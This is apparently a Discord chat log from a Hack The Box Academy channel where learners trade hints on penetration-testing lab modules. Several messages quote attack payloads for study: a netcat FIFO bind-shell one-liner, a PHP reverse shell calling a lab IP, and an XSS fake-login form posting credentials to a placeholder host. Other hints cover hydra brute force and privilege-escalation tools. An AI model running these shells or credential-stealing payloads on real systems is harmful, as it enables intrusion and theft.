#modules

1 messages · Page 124 of 1

novel zephyr
#

i carefully followd it yet on my profile, i cant find my identifier

tidal mango
rustic sage
#

Hello! I’m new!!

acoustic owl
brazen hinge
#

there someone who have done logrotate lab of privilege escalation in linux? i am stuck in which log file i have to use...

craggy hound
#

Anyone done with the Footpriting module? Need some hints for the DNS section.

brazen hinge
acoustic owl
quick crane
#

who can help me in this modulehttps://academy.hackthebox.com/module/143/section/1508

#

I can't find the bro's NT

scarlet iris
#

Hello,
I was able to finish Password Attacks Lab - Medium, but for the last part it was combination of desperation/tips/luck. Could anyone explain me ||how I was supposed to know that we can use Dennis private key to login as root user ? Was I supposed to guess it from vim hisotry and bash history ?||

short hare
#

Password Attacks Lab - Hard
Can anyone help me in mounting xxxxxxx.vhd file ?

short hare
#

😭

tranquil axle
hot crow
#

Hi anybody tried registrytwo

acoustic owl
hot crow
#

I dnt have access to that

rich perch
novel zephyr
#

I'm using enterprise htb web application

#

And I really need a complete guide as I'm just a beginner into this path🥺

#

Ubuntu

#

Please now I need help I know it's not easy please someone should come to my aid😭
I've wasted enough time trying to figure it out myself please

heady tusk
novel zephyr
#

I used this @heady tusk

#

Then this @heady tusk yet I still get Linux as the operating system

#

@heady tusk

heady tusk
#

yeah no need to tag me all the time I'm here 😄

#

have you tried banner grabbing? that's usually a good way to get more details on OS

novel zephyr
#

With netcat? Yes I've done yet no clue

heady tusk
novel zephyr
novel zephyr
heady tusk
#

your best bet will be port 22 as ssh oftentimes has a banner which tells you the exact OS you're dealing with

novel zephyr
heady tusk
#

ugh that should be correct. my answer says "ubuntu"

novel zephyr
#

Is it case sensitive?

heady tusk
#

I'd hope not but who knows 🤷

novel zephyr
#

With the quotation marks?

heady tusk
#

no without

high reef
#

The answers are case sensitive

heady tusk
#

ugh really? that shouldn't be the case for something like this though

high reef
#

For all answers in HTB

heady tusk
#

well yes, but having ubuntu and Ubuntu count as correct would be good in this case

glad condor
#

Hello can i have some help for the "Footprinting Lab - Hard" stuck on snmp enum, i try a lot of snmp enum code without success

lusty thicket
heady tusk
glad condor
heady tusk
#

then cracking a community string will be your next move

glad condor
heady tusk
#

awesome 🙂

twilit gull
#

Construct a valid SSL 3.0 padding of the plaintext bytes "AABBCCDDEEFF". Use the byte 00 for any byte that can be an arbitrary value. Provide the padded plaintext without spaces. Assume the cipher suite TLS_RSA_WITH_AES_128_CBC_SHA is used.

Can Anyone help I'm trying everything but I don't know whats wrong.

autumn drum
#

Hello evereyone

shadow owl
#

Hi there, is anyone interested to stud together Bug Bounty! I'm already doing Server Side Attacks!

heady tusk
#

Hey guys,
I'm kinda stuck on Windows PrivEsc Skill Assessment Part 1. Trying to do PrivEsc but Juicy Potato just won't work and from what I read PrintSpoofer doesn't work either. Also tried Metasploit's 'getsystem' which in the past worked for SeImpersonate but that also failed. any clues as to what I should look into?

twilit gull
#

either of them will work, I used Juciy potato and it worked for me.

twilit gull
heady tusk
#

may I DM? I fear this is gonna be a bit longer

twilit gull
#

Sure

sick fable
#

thank you!

sly kelp
sick fable
sick fable
sly kelp
sick fable
sly kelp
sick fable
craggy hound
#

It's a good cert and I'm enjoying the path so far but it's still not known in the industry

#

i spoke to some HRs recently and they all want nothing other than OSCP lol

vale idol
#

What Shell extension do I upload here?

#

Im supposed to upload a shell

#

I think .php?! im not sure why tho

sick fable
# sly kelp You have a job ?

i study computer science but not in cyber security. i find it fun to learn this stuff, but i don't think i will study cyber security at university

lusty thicket
vale idol
#

the writeup says so @lusty thicket

#

does any of the wappalyzer results on the right indicate that?

craggy hound
vital adder
vale idol
#

@vital adder its tryhackme lmao

#

but that discord support isnt too good

#

only like 2 competent helpers

#

Im just asking abotu the screenshot specifically

vital adder
vale idol
#

does the webalyzer result indicate what extension the shell should be?

vital adder
#

nope

vale idol
#

what does then?

vital adder
#

no idea what kinda of question is that 🤣 generally just use a php shell

#

also why tf are you asking it here

sly kelp
#

I wonder what would they say if he asks something about HTB on THM server lol

vale idol
#

its not a thm related question

#

lmao I sometimes forget the average age here

#

thanks tho

vital adder
#

doesn't matter this channel is for HTB academy module

vital adder
pine dagger
#

lol

sick fable
vital adder
#

i do both

#

but not so much THM lately

vital adder
high reef
#

I wish I could do both 😂 I don’t want anything taking me away from my leaning path here at HTB plus this discord community is super interactive

#

Best one I’ve ever been in

pine dagger
#

Lies

vital adder
high reef
#

I paid for the yearly subscription maybe I’ll check it out what I find difficult here at HTB I’ll use THM to help me understand

vital adder
#

the main selling point of THM is it's beginner friendly so stuff can get boring and doesn't go that depth

high reef
#

Super boring and they beat the concept into ya brain 🧠 with a lot of text so way more reading 📖

heady tusk
vital adder
#

yea got the year bag on there

#

i started on thm

heady tusk
#

yeah I did too but only got up to 20k points. haven't done anything on THM for quite a few months now

sly kelp
#

Same

#

I will do the wreath Network

heady tusk
#

I started that but didn't get far cause I was busy with other stuff and then I kinda just forgot

#

do y'all know anyone who finished Wreath? if it's good I might do it eventually

vital adder
#

that network is not the best but not bad at all also if you still have an subscription checkout the holo network that one is a better but you kinda have to follow the room (i think) doing that blind is a bit hard because the path is too custom

sly kelp
#

*pivoting and Tunneling

Port forwarding with windows Netsh

I am unable to rdp into victor in ip:8080 is there any error in the question ?

zinc marsh
#

why it only shows public

#

if I am using snmp2

rustic sage
#

v2 still uses community strings if that's what youre asking

#

it's v3 that uses uname and pass

fathom pendant
#

^

zinc marsh
#

I am asking how can I bruteforce the strings with hydra

fathom pendant
#

I mean

#

Listen you may not be prepared to hear what the public string is for that lab

#

Aka you're overanalyzing the output

zinc marsh
#

with snmpbrute I can get the strings

#

with hydra I cannot that is what I am asking

fathom pendant
#

¯_(ツ)_/¯

rustic sage
heady sandal
#

where can I get technical assistance?

acoustic owl
heady sandal
#

no assistance / consultion in here as well?

acoustic owl
#

Depends on what exactly you're talking about.
The support usually does not read here

pine dagger
#

If you have questions about modules, etc, you can ask them here. But not technical support.

twilit gull
#

Hi guys, I'm struck in the heartbleed module. Could you help me, I have successfully exploited and got the private key using different method but they have asked for the d value, which I think can be only obtained by the process they used in the module. I'm not able to find the heartbleed.jar file. Could you give a nudge on this?

whole trout
#

Hi there, I'm working on the web requests module, page 4, HTTP headers, supposed to use the browser devtools to find the request to the flag file, reset the target a couple times now and still not seeing it 😕 am I missing something?

pine dagger
lusty thicket
turbid drum
#

I just started with htb, I'm on tier zero I have no idea on how to get the root flag

lusty thicket
turbid drum
#

I'm using kali linux as my primary os

lusty thicket
turbid drum
#

Learn the basic of penetration testing, I believe

whole trout
turbid drum
lusty thicket
lusty thicket
whole trout
craggy hound
#

Starting point. He is at starting point machines lol

lusty thicket
#

the nibbles machine?

craggy hound
lusty thicket
twilit gull
whole trout
peak wolf
#

bdw guys how do I know if my discord verification worked ?

craggy hound
#

you'll get a discord role

lusty thicket
peak wolf
#

damnn I dont think I did anything wrong

#

I will check again

turbid drum
#

Meow

peak wolf
#

dont say that again

turbid drum
#

Lol😭 why?

craggy hound
turbid drum
#

I've been able to download openvpn and launch it through my terminal, and answered a bunch of basic questions, answered all but the last step I'm to submit root flag and I don't know what to do

lusty thicket
craggy hound
turbid drum
#

All 1000 scanned ports on (Ip) are in ignored states

craggy hound
#

xD

lusty thicket
craggy hound
#

Meow

craggy hound
#

I'm guessing yes since you said you're only stuck at the last question. Unless you guessed the answer for the second last question.

#

If you get into the machine the flag is right there

turbid drum
#

Yes I did guess

turbid drum
craggy hound
#

No not connecting to VPN

craggy hound
# turbid drum Yes I did guess

What port did you answer on your Task 6? What's the question and the answer for your Task 7? Use these information to log into the Meow machine as your Task 7 answer.

#

also #starting-point is the channel for asking questions about starting point machines

brazen saffron
#

INTRODUCTION TO NETWORKING is very useful for pentesters? 🤔 I mean, we have some knowledge from Getting Started, NMAP etc.

#

What subject is important is this module.

proud pine
brazen saffron
#

I did SQLi, Getting Started Module, NMAP.

craggy hound
proud pine
craggy hound
#

Alright thankss

craggy hound
#

what protocol uses port 23?

turbid drum
lusty thicket
turbid drum
languid juniper
#

I hate to be asking for help on something that looks to be so basic

craggy hound
languid juniper
#

I am on the Laudanum module

languid juniper
#

after uploading the demo.aspx file

craggy hound
languid juniper
#

I tried \files\demo.aspx

#

same

#

can anyone point me to what I am doing wrong here

#

Im sure it is something stupid

craggy hound
turbid drum
craggy hound
#

Just cat the flag now

tight mesa
#

hello y'all, I'm having this behavior with Attacking FTP from Attacking common services

#

the nmap result says the ftp accept anonymous connection but, when I tried to connect the conection is refused

#

anyone experienced that behavior?

turbid drum
languid juniper
craggy hound
languid juniper
#

Figured it out

#

Im a dummy

leaden pond
tight mesa
#

kewl, can I DM?

leaden pond
#

For sure!

quick cairn
#

hello, I am in "Find the password for the ldapadmin account somewhere on the system" in winPrivEsc assessment one. Does anyone have a hint, ive been looking for quite a while now

brazen saffron
#

INTRODUCTION TO NETWORKING is very useful for pentesters? 🤔 I mean, we have some knowledge from Getting Started, NMAP etc.
What subject is important is this module.

I did SQLi, Getting Started Module, NMAP.

sly kelp
thorn urchin
#

I mean you should understand the basics of networking. Wether or not you need intro to networking is up to you

#

When I first started learning I sat down with TCP/IP Illustrated books and devoured like 3k pages on the subject

#

Forgot most of it but what I retained was a suitable foundation of networking

sly kelp
#

I read a blog it was not all about it but it was great resource

brazen saffron
#

Bc I would like to pass EJPT before december and I would like to know which modules in HTB is useful :).

sly kelp
#

It is actually all of about networking stuff

sly kelp
brazen saffron
#

EJPT is a starter certif, not a expert certif.

sly kelp
#

Dude then I would recommend complete the information security pathway

#

And prepare for exam with course content

digital pewter
#

Interesting that OffSec is rolling out OCR Blue (defensive training) right as the Academy is rolling out their defensive lineup. 🛡️ Its nice to see these stellar blue team training modules becoming available.

brazen saffron
#

?

foggy jackal
#

hello everyone..amy someone be kind enough to sponsor a voucher of gift card for academy? i am short on cubes. DM me

quasi wave
#

I am thinking of switching from CPTS to CBBH because I want to bug hunt really badly

#

and I think CBBH might be more focused

#

will complete Nmap module and then immediately transition

#

then can do CPTS later I guess

cunning prairie
#

Module: Documentation and Reporting. Section: Lab. I completed the lab already but practicing Linux privesc techniques + command injection on the Linux machine. Already got in as www-data and looking around. Possible to get root on this box?

short hare
#

After this
I...... become so NUMB......
I can't 😂 feel you there...!

Thank you soo soo much @heady tusk and @tidal mango
HTB tore be apart... 😂

#

Upto Password Attacks of CPTS path, if anybody need any help feel free to ping/DM me up.

Will be glad to help

😁

echo roost
#

oh man IMAP commands Yuck

shut wraith
#

IMAP 🤢

echo roost
#

hurts my eyes

#

gonna have to telnet

gloomy bramble
turbid drum
#

Thanks, would try and get my Linux and network basics

rain briar
#

sup yall

#

working on teh footprinitng hard lab and cannot load the ssh key

#

keep typing ssh -i id_rsa USER@IPaddress and getting LOAD KEY "id_rsa" invalid format

glossy trail
#

hey @rain briar although i dont have access to that module but you could try simple steps like: ___ 1. delete all old key files that might cause confusion and download a fresh key
2. make sure to check the permissions of key file before running ssh'ing
3. ssh -i ~/.ssh/id_rsa username@example.com -p xxxx

#

please do correct me if I am wrong with any of the steps i am kinda new fingerguns

hexed bluff
#

remember to fill in VHOST

zinc marsh
#

One question about kerberos

#

the KDC can be a different machine than the DC right?

#

you can host the KDC in one server

#

and the DC in other one right?

graceful frost
#

Anyone completed the introduction to AD

echo roost
pine dagger
echo roost
pine dagger
echo roost
pine dagger
#

Click on the x next to the image

wintry basin
#

Can anyone help me in Threat Hunting & Hunting with Elastic Skill Assessment? I'm really having a hard time

short hare
echo roost
#

Attacking Common Services - Easy - You don't really need a full rev shell for this one fyi

#

Hats off fr to though's that took that extra step.

#

Also, ||check the OS. You can't just copy and paste commands from the cheatsheet. Gotta alter things.||

split hearth
#

Do you guys know if their is a way that I could try to do hack things off of my phone? I don't have a PC or laptop so I can't really do anything

short hare
split hearth
vital adder
split hearth
#

Oh sorry

tough prawn
#

Hello, There are some modules that do not have an practicing lab . Do these come with exam?
such as Attacking XSLT , ESI --> SERVER-SIDE ATTACKS

orchid pine
#

Hello guys i foing a privilege escalation i gound a tomcat server running i logged in with credentials im just wondering if tomcat9.0.31 is venurable to any exploit ? Giving more privileges ?

mossy hatch
#

i have a question for the Server-Side skills assessment|| is it normal if i didn't do any Server-side attacks but just JS deobfuscation?||

tough prawn
vapid belfry
#

nc -lvnp 4444
Listening on [any] 4444 .....

stuck on this and show nothing, anyone can assist me?

autumn pilot
#

you've set up a listener, and until something hits the port you've specified in the listener nothing will happen

autumn pilot
#

depending on the case, usually a reverse shell

vapid belfry
autumn pilot
#

go ahead

vapid belfry
vapid belfry
autumn pilot
#

Well, Unified has a walkthrough that can help you solve the machine

pulsar needle
#

AD Enumeration & Attacks - Skills Assessment Part I - Submit this user's cleartext password. - I can't seem to crack ||t***ty's|| password, Ive got the NTLM hash from ||Mimikatz||

pine dagger
pulsar needle
#

Ok, let me try again

#

It doesnt work

analog dock
pulsar needle
#

Oh

#

I did a ||LSA dump|| and found the password in clear text

analog dock
#

👍🏼

tranquil axle
#

Are there any good modules that teach about evasion techniques? I want to start Offshore soon and it makes me realize that I am probably not prepared for any AV or EDR

young lichen
#

can i only do 1 module a day? i just did the intro to HTB but now i can't use the screen for another course

sly kelp
#

Pivoting and Tunneling module

Port forwarding with Windows Netsh
I uploaded the dnscat2.ps1 but when I transfer this to my pivot host PowerShell blocks the execution and HTB did not mention that you need to bypass it or jot

acoustic owl
acoustic owl
sly kelp
violet tundra
tranquil axle
#

Yea I remember shikataganai and some stuff about not dropping files on the drive but launching from memory instead, but that’s basically all

wary magnet
#

hi! i have a question regarding module 103 - cross site scripting exercise

i have followed the instructions with regards to the payload

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

however i do not get the desired "look" of the page.

#

it seems broken

acoustic owl
# wary magnet it seems broken

The modules are usually structured in such a way that you cannot apply them 1:1. You have to change your code a bit most of the time.

edgy escarp
#

I'm trying to start with the very first mod in htb and have bought vip but I'm about to unsubscribe as the very first thing cant even be completed because it refuses to detect I've spawned a machine on the website. I've done so about 10 times with it never detecting its done so I cant do anything

sly kelp
edgy escarp
#

I am working on screen shots right now

#

2nd tab is the open machine but it still says I have to spawn the target machine and the ip will show

burnt sluice
#

oh, that's on the main platform, try refreshing the page.

edgy escarp
#

I have 15 different times

sly kelp
edgy escarp
#

that I dont know because I only have 1

burnt sluice
#

idk what's the problem tbh, but as PTShinobi pointed to the two connections, try reseting ur vpn. and see where that leads, if it doesn't help, u can check with support i think and assk on #1024429874246590575

vocal tusk
#

hi guys im in the middle of the footprinting module and sqlplus is giving me this

#

any chance oe of you has come across it before ?

lusty thicket
# vocal tusk

check if the oracle library is installed on your vm

umbral hearth
#

Could anyone help me with the Attacking Common Applications - Skills Assessment II?

vocal tusk
umbral hearth
#

On the first question "What is the URL of the WordPress instance?"

#

I've made fuzzing to search for subdomains but nothing

acoustic owl
umbral hearth
#

Could I DM?

acoustic owl
#

sure

chrome quarry
#

can anyone help me in dms about shell anatomy module

short hare
kind turret
#

Hello everyone. The most comprehensive and cutting edge NTLM relaying material was just released. Hope everyone likes it 🔥

acoustic owl
#

Why don't the new modules get new cool badges anymore?
Cool modules should get cool badges

kind turret
#

I think this is the default one until they are assigned one

acoustic owl
#

Yes, I suppose so.

vital adder
#

hi @kind turret can i dm you for a bit? i just have some question about getting into module development

acoustic owl
#

Maybe the HTB graphic designer is on vacation 🙂

boreal void
#

Hi, can anyone help me with assembly? Got stuck on a basic assessment task NotLikeThis

vocal tusk
#

Hi Guys Im in the Footprinting Lab Easy i have the comand to get the keys says its downloading files gives me the number of files downloaded and the size but somehow the folder is empty

paper crag
#

I beg to differ here @Pedant...I'm currently on the same exercise in the CRLF log injection attacks section and the question asks you to get command execution by injecting into the log file. The example it gives is PHP injection into the logs. However, anything you attempt to inject into the log, for example %0d%0a, or < or > or %3c gets stripped out by something and so doesn't work. So there is clearly some kind of filtering happening which I assume you have to bypass to achieve RCE?

pulsar needle
#

Active Directory Attacks and enumeration, I am stuck on the question that asks me to comprimise the Domain Controller, Ive got the Hash of the password of some important accounts but I cant crack them

pulsar needle
#

Not to my knowledge

#

Is it possible to pth?

#

wait, I am hungry

brittle umbra
#

I came across this page:
This guy literary copied and pasted htb's content as his article. Even with flags visible. Is this even allowed? Should this be reported?

proud pine
brittle umbra
#

ok, deleted the link. Who I report it to?

proud pine
brittle umbra
#

got me here lol. I'll look around. Thanks

analog dock
pulsar needle
#

Yes

vital adder
pulsar needle
#

It is, but I have to find out how to do it in my scenario

#

hehe

brittle umbra
#

I started a chat on htb's page. that should do 🙂

vital adder
#

oh then in that case report this to people at support when you get in touch with them

vital adder
vital adder
whole light
#

Guys how I can enable bidirectional shared clipboard in htb academy machine???

vital adder
#

use Full Screen

slate palm
#

I think htb should currate their random(??) username list ||inlanefreight.local\luder1954 ||

hexed void
#

find / -type f -name *.config -newermt 2020-03-03 -size -28k -size +25k

#

Could someone give me some guidance on what I'm doing wrong? I'm getting about 100+ files with this specification

pulsar needle
tranquil axle
hexed void
#

yeah this ones getting me, I tried just newer and I don't think that's a command

#

the only command the module has taught at this point is newermt

vital adder
#

which module and section are you on?

tranquil axle
hexed void
#

Linux fundamentals, files and directories - I think I'm getting closer. And trust me, I'm not asking you as my sole resource I'm definitely digging for this.

#

I try to avoid asking for help here unless I'm really stuck, as typically people make comments shaming that as if one is not resourceful =p

vital adder
#

this is good because some people just give in a ask for help right when the first thing they try doesn't work 🤣 don't want to point finger because there is too many and i don't have enough finger

kind turret
hexed void
#

you can check the search, I never ask here. I thought maybe

find / -type f -name *.config -newermt 2020-03-03 ! -newermt 2020-03-03 -size -28k -size +25k

would fix it, but still kicks back a few hundred files. still digging in

#

It may be wrong, but I go to GPT for most of my help because it can really break things down very precisely

vital adder
hexed void
#

oh man, it may be the .conf.

vital adder
#

yea give that a try if you still get like 100+ file i'll double check it

hexed void
#

it would be something small like this -_-

vital adder
hexed void
#

Gotta get to work, I'll circle back in a bit.

vital adder
#

oh no that is just for filtering out the permission denied

pulsar needle
vital adder
#

@hexed void ok so as far as my ape brain can see both of your command is the same if this is the case and you count the error as an output then that's the issue

#

just give your command a try with the 2>/dev/null thing at the end (for filtering error) and that five me back 1 single file

#

*with the .conf

naive wadi
#

I keep having issues logging into the workstation in the Active Directory Enumeration & Attacks section. Has anyone else experienced this? I know I have the credentials correct as they are just the standard ones on the page, so unsure as to what it could be.

proud pine
naive wadi
#

literally copying and pasting it

#

then re-checking

naive wadi
#

have also tried typing to see if I am going crazy but nope

#

I've also restarted the machine numerous times

#

It's annoying as I cannot progress as I need to now use tool on a domain joined windows host

vital adder
naive wadi
#

as in what RDP tool? redesktop or xfreerdp

#

if you mean by needing to progress, snaffler

vital adder
naive wadi
#

Thanks

quick cairn
#

any idea how to solve this question, module DOCUMENTATION & REPORTING ? Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.). i have inputed [ctrl] + [b] + [%] as anwer but its wrong

untold knot
#

hello,
I am doing web request - header request.
And I found the flag_... in the request header. But the flag is not accepted, what can I do?

lusty thicket
untold knot
#

sorry, my bad. I have the answer.

trail leaf
#

I ran into the same issue as well

quick cairn
#

@trail leaf can i dm you

trail leaf
#

why ask when you were going to do it anyway

#

also just ask here lol

zinc marsh
hexed void
#

Anyone able to DM for help with a module? I've spent hours on this and I'm honestly getting pretty over it.

hexed void
#

Not sure I follow what you mean, I don't know the file name that's what I'm searching for by specific criteria. the examples given by the module show me it wouldn't be -type *f

#

There's over 100 files in this SSH that are .configs between 25 and 28k in size

#

it wants "the one"

thorn urchin
#

start reading 😉

#

jk I havnt done that question

hexed void
#

This is the first time I feel like the material did not set me up to be able to figure this out, hence me coming here. And theres been some tough ones coming up to this.

thorn urchin
#

which module and section is it again?

hexed void
#

find files and directories, linux fundamentals

thorn urchin
#

gotcha havnt done that module sadly

tranquil axle
#

you could try -newerBt to look for a birth date newer than the provided date

hexed void
#

yeah I think its just -newermt, not both

#

we haven't learned newerBT yet

#

the one newermt would mean files created after that date, which is what it wants

tranquil axle
#

in my head modifydate and creationdate are not the same thing

#

and dont expect the module to teach you the exact command, the assessments are often set up in a way that you need to research a little yourself or modify the example from the module text to make sure you really understand what you are doing and not just copy pasting the module content

thorn urchin
#

yup very common theme

#

assessments are almost exclusively designed to challenge your conceptual knowledge, not your rote memorization and ability to yo follow given steps

tranquil axle
#

I tried the command you posted above (without the ! -newermt 2020-03-03 part) and it gave me the correct file

hexed void
#

how do you know its the file if you didn't specify its creation date?

tranquil axle
#

find / -type f -name *.conf -newermt 2020-03-03 -size -28k -size +25k 2>/dev/null

#

just the 2nd part I mean

#

it runs a few seconds and returns one line, the file you need

hexed void
#

Honestly, looking at that code, I feel like I've run that exact one like 3 times so I'm kind of at a loss. But thank you

#

I need to spend more time understand the dev bit at the end.

tranquil axle
#

I think when you tried this earlier you did it on *.config and then by the time you switched to *.conf you added other stuff to the command that made it not work

#

the 2 > /dev/null can be used behind any command to redirect the error output to a file, our "file" in this case is /dev/null which basically means "discard all error messages". Otherwise your output gets spammed with "Permission denied on file xyz"

hexed void
#

that makes a lot more sense. thanks man.

#

This one got me pretty frustrated lol. I'm gonna saturate on this one for a while.

hexed void
#

yeah 2>/dev/null is a game changer. everything seems to line up with it.

atomic briar
#

I tell ya what I learned today: services can hide inside other services! hahha
I just completed the Password Reuse / Default Passwords box inside the Password Attacks module.

Makes me wonder what services were hiding in other boxes when I just did an nmap and assumed that's all there was to find...

thorn urchin
#

wdym services hiding inside other services

atomic briar
#

the ||mysql only accessible once you're already in ssh||

thorn urchin
#

Thats not a service hiding inside another service

#

thats because the firewall was blocking access externally

#

but once you have access to the host, well firewall isnt gunna block the host from itself now is it?

atomic briar
#

yeah true that's a more accurate way of describing it

#

but not as fun

thorn urchin
#

Its a meaningful difference

#

Because there can be conceivably other ways to reach that service that had nothing to do with ssh. So thinking it of a service inside another service is very limiting to your mental model of the target

atomic briar
#

yep, good point

thorn urchin
#

as opposed to something like a service running inside a docker container which could be reasonably viewed as a service inside another service and would warrant a different line of thinking to tackle

atomic briar
#

hahah I tell you the second thing I learned today....

atomic briar
#

hey thanks for pulling me up on that lazy thinking. I'm now sitting here revising a bunch of my notes as a result.

thorn urchin
#

np

mortal echo
#

Hey guys

lusty lotus
#

Hello guys

#

@mortal echo Hello mates

heavy marsh
#

Can anyone please explain the bin shell with netcat module code: rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f ?

#

Each individual command makes sense, but I don't see how this gives you a bind shell.

#

Also the module is unclear as to whether the IP is the attack box or the target.

#

I've done some searching and everything I've found is related to stderr and stdout.

gloomy bramble
heavy marsh
#

That's where I'm confused

proud pine
heavy marsh
#

I'm starting to understand the breakdown a bit, I just don't see how we get a shell from the attack machine when the -l is on the target

rustic sage
#

how i can get numbers in a specific range using the grep command?

heavy marsh
#

I also don't understand the "cat /tmp/f" portion. We haven't put anything in that file, what is it concatenating, or does that come later in the lesson?

proud pine
heavy marsh
#

So let's see if I have this correct: We remove tmp/f if it exists, put a FIFO object there, which is kind of a placeholder, and then concatenate it, but at the same time that concatenation is piped to a shell (/bin/bash) where stderr and stdout are combined into an interactive shell, and then that's piped to a listener with the IP of the attacking machine which writes each command back to the FIFO being concatenated, which then effectively gives us the abilty to connect with -nv and get a shell.

heavy marsh
#

now that I'm painfully wrapping my head around this

#

please correct me if I'm wrong, and thank you both for the help @proud pine and @gloomy bramble

gloomy bramble
#

Here is a sample of one I use sometimes: <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.XXX 4444 >/tmp/f"); ?> That is my ip a ip

fathom pendant
#

ip a just shows all ip interfaces

gloomy bramble
heavy marsh
#

Did my explain what I think I just learned back to myself like I'm 5 version sound close to what's going on?

proud pine
#

You run a nc listener, waiting for that payload to connect to you.

#

So in the case of the VPN connection, yeah, it would be your tun0 IP

#

In the case of an over-internet situation, it would be your WAN IP, and in the case of a pivot situation, the 'next hop' before it reached you.

trail leaf
#

grep should support regex without supplying any new flags iirc, but it's definitely been more consistent if you use the -E flag

heavy marsh
proud pine
heavy marsh
#

So it would be their IP?

proud pine
# heavy marsh So it would be their IP?

I don't think I've ever used nc for a bind shell, but yeah, it looks like you can specify the IP for -l, and you'd use whatever is facing your attack box.

heavy marsh
proud pine
#

The rest of the function of the shell command remains the same, since the loop it built is just based on the input/output from nc and bash.

full drum
#

Hi there, i'm working on the module Windows Priv Esc, and am currently at an impasse on the Skills Assessment I page, where I have a low priv user powershell on the target system but can't find the credentials or escalate my session using JuicyPotato or PrintSpoofer. Any help or nudge in the right direction would be appreciated! thanks!
Edit: NVM Solved!

bitter otter
#

yo guys any idea on the catch the flag cft input key?

manic ice
#

i can't seem to connect ssh for this

acoustic owl
manic ice
#

just saw that. 🤦‍♂️ thanks for the quick reply though

#

any tips on how i should go about with this?

fathom pendant
#

Google it tbh

manic ice
#

i did and got the answer. didn't occur to me when i got stumped. will be a point of reference in future 🤣

fathom pendant
manic ice
#

i remember seeing that and somehow am glad the concept of 'google' came up from the back of my head came up before i read it here 🤣

manic ice
dusky rivet
#

Hello everyone,
I'm seeing many people complaining about the module "Password attacks - Cracking file".. So I'm just another one 🥳
The question is:
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

My analyze:
We can see the port 21 (ftp) is open on the target. We have a login: Kira.
Goal:
Mutate the password list with rule in resources, apply it on the password list.
So I tried to : hydra -l kira -P The_Password_list_mutated.txt -t 48 ftp://Target_IP

Problem: the bruteforce will take 3h30 to try all of them.
Question 1 : Do we have Kira password? (I checked other module in password attacks, nothing)
Question 2: Is that the correct plan? (mutate the passwordlist + bruteforce)

Thanks in advance and have fun 🫡

Edit: The plan was correct, we have to wait 15min

fathom pendant
fathom pendant
dusky rivet
#

Yup you're right, we can put on hydra "-t 64"
Looking for the password, yes... I was pretty sure I already saw it somewhere.. But forgot where x)

tranquil axle
#

be careful with too many threads on hydra, too many connections can make it time out valid attempts and accidentaly skip credentials

dusky rivet
#

correct, I re-tried to cracj the password for kira on ftp with -t 64, Hydra didn't found it, but with -t 48, it find it correctly

lusty lotus
#

Good morning guys

#

@dusky rivet sup man

dusky rivet
lusty lotus
#

Are you an hacker like me too man ???

dusky rivet
wary magnet
#

is the lab broken for xss hijacking? i can't seem to send the request when i click register

tulip dragon
#

should i take part in ctf events even if i have not completed teh modules yet or should i wait for ctf

tulip dragon
acoustic owl
fathom pendant
#

Make sure you're launching the connect command from a writable directory e.g. /tmp/

#

What is the error you're getting from smb?

#

Are you sure you're doing the connect command correctly?

#

You need to blur out any names/passwords my guy

#

Well have you actually tried connecting AFAIK smbmap only scans it doesn't do interactive connection

#

*I haven't used smbmap much

#

I didn't use smbmap so wouldn't know. Just used standard smbclient ¯_(ツ)_/¯

split ruin
#

can anybody help me with logrotate ?

analog dock
#

Ask your question more specific

peak fjord
#

Hello, I'm doing the NMap module on HTB Academy and just wondering if there is a quicker way to run NMap scans on my own VM as they are taking a while

vagrant orbit
#

Hi, is anyone available to help with the Linux File Transfers module? I am unable to use gunzip to extract the zip file.

vagrant orbit
rich perch
#

Hello! I'm stuck on the Documentation and Reporting practice lab. I can't work out how to get Domain Admin. I got a lot of hashes through Responder and cracked them all, but when I RDP in that server is not the DC. I looked through all the findings and found that the DC IP is ||172.16.5.5|| but none of the other credentials got me in. I feel like I'm overthinking this, can someone give me a nudge?

fathom pendant
vagrant orbit
#

Gave that a go but unzip isn't installed on the target system

#

and using the hint command just throws an error because the file isn't a .gzip

fathom pendant
#

Target system is windows yeah?

vagrant orbit
#

linux

#

Second question from the Linux Transfer section

vital adder
# peak fjord Hello, I'm doing the NMap module on HTB Academy and just wondering if there is a...

Understanding NMAP timing options is essential in planning a proper scanning strategy for ethical hacking and penetration testing purposes - especially when

fathom pendant
#

Try tar -xf {filename}.zip

vagrant orbit
fathom pendant
vital adder
#

if you are new here read #welcome and #rules if you are on HTB use /verify at #bot-commands to verify your account, this channel is for HTB academy

ivory plover
#

Ok

solid quarry
#

Diamond And Sapphire Tickets needs to be on attacking kerberos

sick fable
#

which modules are a must for starting easy machines in HTB? if there are any. i don't want to start too early

sweet trellis
#

I'm stuck on the Footprinting NFS module. When I attempt to mount the NFS share, I get the error: mount.nfs: access denied by server while mounting 10.129.202.5:/. I have tried appending the file paths shown when I run showmount -e, but get the same error. I know this is probably a simple issue, but I've been stuck on this for hours. Google and ChatGPT have proven unhelpful. Any advice?

echo roost
sly kelp
#

You solved it lol ?

sly kelp
#

Pivoting and Tunneling

craggy hound
#

I'm not even close to that yet haha

sly kelp
#

Help me when you reach 9/18 lol

echo roost
#

did tha one. I did them a little out of order for extra learning to take the OSCP and eventullay the HTB exam.

sly kelp
#

I am stuck

echo roost
sly kelp
#

Even after setting the pivot with netsh

#

I can't get it on my Kali

craggy hound
#

btw the modules should be followed in the way they're in the path or is there a better way?

sly kelp
#

It is better to follow the order

#

I changed Vpn to US
Tried with remmina rdp

#

Even added the /d:DC flag for domain

echo roost
#

I agree, I am doing only certain ones as a knowlege gaps. Practice on the module where I know I am weak like SQli. This is only becasue I have time constraint and am using the HTB academy to supplement my OSCP exam training.

sly kelp
#

That's is good you have different goal so it does not matter but for CPTS you have to follow order

craggy hound
#

Thanks

#

Have y'all tried the SOC path yet? It's quite nice too

sly kelp
sick fable
#

if you use a university email with subscription you don't have to pay for unlocking modules. but do you earn cubes from this modules?

craggy hound
#

